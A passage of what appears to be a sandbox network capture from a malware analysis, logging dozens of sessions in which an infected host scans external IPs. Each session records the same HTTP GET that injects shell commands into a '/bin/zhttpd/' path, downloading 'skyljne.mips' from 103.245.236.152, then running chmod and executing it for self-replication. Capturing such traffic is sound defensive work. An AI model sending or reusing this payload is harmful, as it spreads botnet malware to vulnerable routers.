                                          Jan 14, 2024 15:46:35.436829090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9119192.168.2.2351498134.55.5.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436858892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9120192.168.2.2360342162.191.66.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436928988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9121192.168.2.2351116178.43.148.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437005997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9122192.168.2.2349450122.117.110.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437027931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9123192.168.2.233579887.146.250.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437057972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9124192.168.2.2341118199.152.190.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437104940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9125192.168.2.2347604210.108.169.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437155008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9126192.168.2.23442861.69.236.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437172890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9127192.168.2.2351658166.206.39.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437242031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9128192.168.2.235710664.105.7.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437269926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9129192.168.2.233376468.237.118.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437321901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9130192.168.2.2338932153.150.131.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437356949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9131192.168.2.2357634140.207.135.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437412977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9132192.168.2.235096686.182.65.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437477112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9133192.168.2.235213431.42.145.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437514067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9134192.168.2.2348418178.148.255.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437582970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9135192.168.2.2334764115.123.76.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437642097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9136192.168.2.2355554222.136.202.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437700033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9137192.168.2.2355132102.162.45.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437766075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9138192.168.2.2354272205.77.62.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437798023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9139192.168.2.2345422183.122.228.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437848091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9140192.168.2.2349644110.12.177.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437876940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9141192.168.2.234354414.194.57.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437946081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9142192.168.2.2348906112.36.159.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.437999964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9143192.168.2.2336664130.186.50.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438066006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9144192.168.2.235465276.7.137.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438100100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9145192.168.2.235989859.155.212.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438167095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9146192.168.2.2351484184.83.39.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438209057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9147192.168.2.2341206205.83.242.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438324928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9148192.168.2.235050844.248.9.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438364029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9149192.168.2.233453081.68.73.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438441038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9150192.168.2.2354900134.147.61.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438492060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9151192.168.2.233807691.224.188.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438513994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9152192.168.2.236011072.127.216.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438576937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9153192.168.2.2338550201.205.16.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438636065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9154192.168.2.2334132125.72.67.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438680887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9155192.168.2.23436322.236.210.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438741922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9156192.168.2.2358820223.114.126.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438795090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9157192.168.2.2338410107.115.47.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438839912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9158192.168.2.2339188194.43.172.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438905954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9159192.168.2.2357224198.223.16.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.438962936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9160192.168.2.235830892.52.91.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439023018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9161192.168.2.235253086.74.53.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439088106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9162192.168.2.236062690.171.149.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439145088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9163192.168.2.233594666.214.226.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439204931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9164192.168.2.2333050154.254.90.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439264059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9165192.168.2.2347406168.60.56.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439299107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9166192.168.2.2337662106.105.48.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439337015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9167192.168.2.2355894121.14.127.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439393997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9168192.168.2.233793023.32.61.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439451933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9169192.168.2.235505239.30.126.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439502954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9170192.168.2.2348402185.56.20.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439562082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9171192.168.2.2347930129.59.60.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439632893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9172192.168.2.2345086199.172.248.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439677000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9173192.168.2.234768420.54.164.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439743042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9174192.168.2.234675073.172.195.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439776897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9175192.168.2.2335340196.191.131.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439842939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9176192.168.2.235620884.18.41.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439882994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9177192.168.2.2337208191.3.193.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439939022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9178192.168.2.2340508169.31.197.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.439973116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9179192.168.2.2350384134.214.248.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.440006018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9180192.168.2.233282031.109.84.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.440083027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9181192.168.2.234722057.92.71.188443
                                          TimestampBytes transferredDirectionData
